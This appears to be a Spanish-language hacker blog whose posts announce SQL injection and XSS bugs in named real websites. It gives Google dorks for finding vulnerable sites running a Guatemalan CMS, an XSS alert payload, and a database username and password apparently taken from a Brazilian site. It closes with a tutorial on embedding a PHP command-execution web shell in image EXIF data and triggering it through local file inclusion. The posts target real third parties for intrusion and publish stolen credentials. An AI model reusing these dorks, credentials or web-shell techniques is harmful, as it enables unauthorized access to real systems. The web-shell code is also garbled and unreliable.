.::CMS GUATEMALTECO VULN ::.

Publicado por xDarkSton3x On 14:53 0 comentarios
.:: CMS GUATEMALTECO VULNERABLE ::.
 Si asi esta el proveedor.. imagenense sus clientes
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.nebsgt.com
######################
*Author:
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
contenido.php?id='
######################
*Dork
allinurl:.gt/contenido.php?id=
intext:Powered by NeBSGT
Comprobe en 5 webs y todas son vuln.. Saludos

Bug: ebuddy.com [XSS]

Publicado por xDarkSton3x On 22:17 0 comentarios
### Datos Generales ###

Autor: xDarkSton3x
Bug :Xss

 
 Greetz: [ Banz0k - Rs4 - FailRoot - w4rn1ng - Trouk ]

Bug: mundoxat.com [XSS]

Publicado por xDarkSton3x On 19:57 0 comentarios
### Datos Generales ###

Autor: xDarkSton3x
Bug :Xss


Greetz : [Banz0k - Rs4 - FailRoot - W4rn1ng - Trouk]

Bug: vamosrirmais.terra.com.br [ Sqli ]

Publicado por xDarkSton3x On 1:04 0 comentarios
### Datos Generales ###

BD: vamosrirmais_db
User:lq_sorriso_di  -  Pass:45trid788
Autor: xDarkSton3x
Bug : Sqli
 
 
Greetz : [ Banz0k - Rs4 - FailRoot - Trouk - W4rn1ng - Almaly ]

Bug: terra.com.pe + [XSS]

Publicado por xDarkSton3x On 20:54 0 comentarios
### Datos Generales ###

Autor: xDarkSton3x
Bug : Xss

 

 Bien Buscando mas Xss por los dominios de terra me encontre con otros...! 


Bug :rpp.com.pe [XSS]

Publicado por xDarkSton3x On 8:25 0 comentarios
Dr.White  :

Pues puse " en ves de arroba por que se me cambio el idioma de la pc y se escribio en medio de la pagina y dije WTF y en eso dije a ver comenze a provar hice que salte un marquee pero no podia hacer nada mas le pase el bug a xDarkSton3x me ayudo con la Expl0tacion y pudimos hacer que salte el Alert :).

Inyeccion:

//">'><SCRIPT>alert('SeguridadBlanca And xDarkSton3x')</SCRIPT>




Saludos con Todos

Inyeccion de Imagen

Publicado por xDarkSton3x On 21:44 0 comentarios

Las maneras de utilizar la inclusión de archivos locales son numerosas y cada vez más imaginativas...Obviamente de quien lo realiza xD , como en el caso de la "Inyeccion de imagen". Hoy vamos a ver qué significa, qué es y cómo se puede explotar.


Digamos que usted encuentra un sitio vulnerable a LFI, vamos a decir que este sitio también tiene una página que nos permite  subir imágenes, como por ejemplo una comunidad. Bien ahora

¿Cómo usar un avatar para explotar el LFI?

Sabemos que una imagen, al igual que todos los archivos, contiene datos distintos de los que se constituyen en sí, hay otros que retienen información sobre el tipo de cámara utilizada, la fecha y la hora en que fue tomada la foto, comentarios, etc...Estos son llamados “Exif”

 Exif: Exif es una abreviación de “Exchangeable Image File Format”. En pocas palabras, es una estandarización de la información sobre el formato de la imagen. [ Según Google ]

 Pero precisamente este tipo de información es la que modificaremos para agregar un pequeño script PHP dentro de la imagen. Para ello utilizaremos el programa Jhead , con el que podemos ver y editar los datos EXIF de cualquier imagen se nos venga en gana xD..

Aquí Tenemos las propiedad de una IMAGEN sin la modificación



 Bien Ahora... lo que haremos sera Agregar un codigo PHP que nos permita Ejecutar ciertos comandos.
 
<Php $ s = $ _GET; @ chdir ($ s ['d']) echo sistema @ ($ s ['y'])?> 


Nuestro Pequeño Script Quedara grabado dentro de los dato EXIF 

Bien Ahora lo que haremos es cargar nuestra imagen en el sitio e incluirlo en la página vulnerable a las variables de secuencia de comandos de la definición de LFI, en este caso d y e del directorio para el comando a ejecutar. Cabe destacar que tambien podemos usar esto para byppasear algun Upload , solo es cuestion de jugar un poco con todo esto.. Saludos

http://localhost/metalsoft.php?test=/directorio/Imagen1.jpg & d = / = y & ls


 Eso fue todo, espero entiendan mas que sea un poco de lo que explique xD..!  Saludos.

xDarkSton3x | MetalSoft #Team